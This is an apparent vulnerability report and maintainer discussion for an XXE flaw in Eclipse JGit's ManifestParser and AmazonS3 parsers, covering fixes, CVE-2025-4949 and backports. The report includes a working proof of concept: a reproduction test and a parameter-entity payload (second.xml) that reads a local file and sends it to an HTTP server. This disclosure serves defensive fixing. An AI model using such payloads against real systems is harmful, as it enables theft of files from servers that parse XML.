XXE vulnerability in Eclipse JGit

Summary

jgit is vulnerable to XML External Entity (XXE) attacks when parsing XML files. This vulnerability can lead to information disclosure, denial of service, and other security issues.

The vulnerability is present in the ManifestParser and AmazonS3 classes, which use a SAXParser to parse XML files without properly configuring it to disable external entity processing.

Vulnerability Details 1

The vulnerability occurs in the ManifestParser class [0], specifically in the read method. The code uses a SAXParser to parse XML files without properly configuring it to disable external entity processing. This allows an attacker to craft a malicious XML file that can exploit the XXE vulnerability.

The attack can be reproduced by adding this testcase to the ManifestParserTest class:

@Test
	public void testXXE() throws  Exception {
		String baseUrl = "https://git.google.com/";
		StringBuilder xmlContent = new StringBuilder();
		xmlContent.append("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n")
				.append("<!DOCTYPE foobar SYSTEM \"file:///does_not_exist/second.xml\">")
				.append("<manifest>")
				.append("<remote name=\"remote1\" fetch=\".\" />")
				.append("<default revision=\"master\" remote=\"remote1\" />")
				.append("<project path=\"foo\" name=\"").append("foo")
				.append("\" groups=\"a,test\" />")
				.append("<project path=\"bar\" name=\"").append("bar")
				.append("\" groups=\"notdefault\" />")
				.append("<project path=\"foo/a\" name=\"").append("a")
				.append("\" groups=\"a\" />")
				.append("<project path=\"b\" name=\"").append("b")
				.append("\" groups=\"b\" />").append("</manifest>");

		try {
			new ManifestParser(null, null, "master", baseUrl, null, null)
					.read(new ByteArrayInputStream(
							xmlContent.toString().getBytes(UTF_8)));
            fail("ManifestParser did not throw exception for XXE");
		} catch(FileNotFoundException e) {
			assertTrue(e.getMessage().contains("second.xml"));
            e.printStackTrace();
		}
		catch (IOException e) {
            fail("Exception should be FileNotFoundException");
		}
	}

When executing the test, the ManifestParser will attempt to read the external entity file:///does_not_exist/second.xml. Instead of reading a local file, it is also possible to read a remote file by using a URL like http://example.com/first.xml.

File content can also be read from the local filesystem and disclosed to an attacker. For this, run python serve.py and changed file:///does_not_exist/second.xml to http://localhost:8000/second.xml in the test case.

The server should show a request for second.xml and the content of /tmp/lol (foobar) should be shown like this:

127.0.0.1 - - [05/May/2025 22:28:42] "GET /second.xml HTTP/1.1" 200 -
127.0.0.1 - - [05/May/2025 22:28:42] "GET /?foobar HTTP/1.1" 200 -

server.py:

import http.server
import socketserver


class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
    def guess_type(self, path):
        # Override the MIME type for .xml files
        if path.endswith(".xml"):
            return "text/xml"
        return super().guess_type(path)


# Define the port
PORT = 8000

# Create the server
with socketserver.TCPServer(("", PORT), CustomHTTPRequestHandler) as httpd:
    print(f"Serving files on port {PORT}")
    httpd.serve_forever()

second.xml:

<!ENTITY % file SYSTEM "file:///tmp/lol">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://localhost:8000/?%file;'>">
%eval;
%exfil;

Limitations

As far as I am aware, it is NOT possible to exfiltrate files from the local filesystem that contain linebreaks. This is because Java rejects linebreaks in URLs. (E.g. new URL("http://localhost/foo\nbar").openConnection() fails with java.net.MalformedURLException: Illegal character in URL) However, I would cautiously assume that there is still a way of exfiltrating files with linebreaks by using a different encoding or some other trick.

Fix

I think it should suffice to set the following features on the XMLReader instance in the ManifestParser class:

xr.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
xr.setFeature("http://xml.org/sax/features/external-general-entities", false);

Vulnerability Details 2

The vulnerability occurs in the AmazonS3 class [1], specifically in the list method. The code uses a SAXParser to parse XML files without properly configuring it to disable external entity processing. This allows an attacker to craft a malicious XML file that can exploit the XXE vulnerability.

I didn't find an easy way to reproduce the attack, but I see no reason why it shouldn't work like the first vulnerability. The list method is used to list objects in an S3 bucket, and if an attacker can control the XML response from S3, they could potentially exploit the XXE vulnerability.

Credit

Simon Gerst (intrigus-lgtm) https://github.com/intrigus-lgtm.

[0] https://github.com/eclipse-jgit/jgit/blob/e74771cb962bdef344e6b87658e75c9aca07fee3/org.eclipse.jgit/src/org/eclipse/jgit/gitrepo/ManifestParser.java#L145

[1] https://github.com/eclipse-jgit/jgit/blob/e74771cb962bdef344e6b87658e75c9aca07fee3/org.eclipse.jgit/src/org/eclipse/jgit/transport/AmazonS3.java#L763

added From_ML statusawaiting_project vulnerabilityunconfirmed labels

assigned to @mbarbero, @msohn, @mrybczyn, @twolf, and @ifrade

changed title from XXE vulnerability in jgit to XXE vulnerability in Eclipse JGit

It sounds sensible to disable external entities. This could break some existing manifests, but it is worth the trouble.

Nit: The provided test passes (throws "not found") before and after disabling the external entities.

Do we need DTDs? I would suggest to switch those off, too, as per the OWASP recommendations.

What exactly are the contents of the Amazon S3 XML?

AFAICS we are calling https://docs.aws.amazon.com/AmazonS3/latest/API/API_ListObjects.html with an optional prefix to list S3 buckets under a given prefix, the ListParser extracts "Key", "IsTruncated", "LastModified" and "Contents" and is using a marker to page through results.

BTW: the original reporter would like to be in the loop; see https://github.com/eclipse-jgit/jgit/issues/161 . Is that possible, given that this issue is confidential, and the reporter probably doesn't have an EF Gitlab account?

We cannot add individuals without an EF account to EF GitLab confidential issues.

However, if JGit is open to using GitHub security advisories, we can enable that feature and publish future vulnerability reports there. Reporters would also be able to create advisories themselves.

Let us know your preference!

Also, I mentioned to the reporter that I could add him here, but they would need to create an EF account. I haven’t received any response.

I propose we don't jump through hoops for the reporter since we already have the fixes and I can create 7.3.1 later today.

Could we get a CVE number reserved for publishing the vulnerability ?

What is the best way to work on this? At the moment, attached a .patch of the fix for ManifestParser: 0001-ManifestParser-Do-not-accept-DOCTYPE-and-entities.patch

The test needed some rework and there is an extra option to disable.

Ah! https://gerrit-review.git.corp.google.com/c/jgit-security-fixes/+/475601

Here is a corresponding fix for AmazonS3 https://gerrit-review.googlesource.com/c/jgit-security-fixes/+/476041

When these changes are approved I propose we push them to gerrithub to the stable-7.2 branch. Then I can create a service release 7.2.1 to ship the fixes for the latest release 7.2.0.

The fixes also apply cleanly on stable-6.10. Though I am not sure if we need to create new releases also for older releases.

Both changes look good.

I propose we push them to gerrithub to the stable-7.2 branch

Sounds good to me. There is also stable-7.3, what would be the flow of these changes? submit in stable-7.2, gets merged into master, stable-7.3 is updated to master?

yes, exactly

Until we release 7.3.0 in June the stable-7.3 branch is used to build milestones and release candidates only.

I released JGit 7.2.1.202505142326-r containing the fixes for this report. It's published on repo.eclipse.org and Maven central. It usually takes a while until new releases are visible on Maven central.

@mbarbero Could you reserve a CVE number for this vulnerability, so that we can publish it in the release notes?

Of course, please fill in an issue with the details in https://gitlab.eclipse.org/security/cve-assignement/-/issues/new?issuable_template=cve#. Thanks!

I created cve-assignement#64 (closed) to request CVE with publication as the fix release is already available, please review

mentioned in issue cve-assignement#64 (closed)

Why can't I edit labels on this issue ? Status is now fixed and the vulnerability is fixed but that's not reflected in labels of this issue.

It's a limitation in gitlab with confidential issues.

added resolutionfixed vulnerabilityconfirmed labels and removed vulnerabilityunconfirmed label

removed statusawaiting_project label

added cvepublished label

CVE CVE-2025-4949 is published

closed

made the issue visible to everyone

removed cvepublished label

No big deal, however is there any chance that the fix for this can be back-ported to a 6.10.1 release; assuming it is also vulnerable?

Some of us are stuck on 6.x still due to use of the HTTP GitFilter binding alongside the move in JGit 7.x to the jakarta.x servlet 6 APIs (thus needing to untangle and upgrade many other dependencies at the same time) :-(

sure, I cherry-picked the fixes to the stable-6.10 branch and will tag 6.10.1 later today:

• https://eclipse.gerrithub.io/c/eclipse-jgit/jgit/+/1215019
• https://eclipse.gerrithub.io/c/eclipse-jgit/jgit/+/1215020

@msohn, let us know once done, we will update the CVE record to describe that [6.10.1,7) contains the fix as well

I backported the fixes to the stable-6.10, stable-7.0, stable-7.1 branches and released

• 6.10.1.202505221210-r
• 7.0.1.202505221510-r
• 7.1.1.202505221757-r

releases are available on repo.eclipse.org and Maven central

Thank you for considering and applying this, much appreciated!

CVE CVE-2025-4949 is updated.

Hello @msohn,

Is it possible to port the fix to the 5.13.3+ version?

Thanks!

I cherry-picked the fixes to the stable-5.13 branch https://eclipse.gerrithub.io/c/eclipse-jgit/jgit/+/1215694 Though we don't have Java 8 based build jobs anymore. Could you validate these changes using java 8 locally ?

The compile-and-test maven build succeeded. The tycho packaging build failed because it could not build the target platform; it cannot download bundle org.eclipse.osgi,3.11.3.v20170209-1843 from https://download.eclipse.org/releases/neon/201703231000/plugins/ .

No idea why that fails from the CI, I can download https://www.eclipse.org/downloads/download.php?file=/releases/neon/201703231000/plugins/org.eclipse.osgi_3.11.3.v20170209-1843.jar from my laptop.

Perhaps some timeout? Accessing the directory through the link I gave takes about 2 minutes until it serves anything. Downloading the bundle directly indeed works. (And is snappy.)

Hi again,

Have you made any progress with the 5.13.3+ patch?

Thanks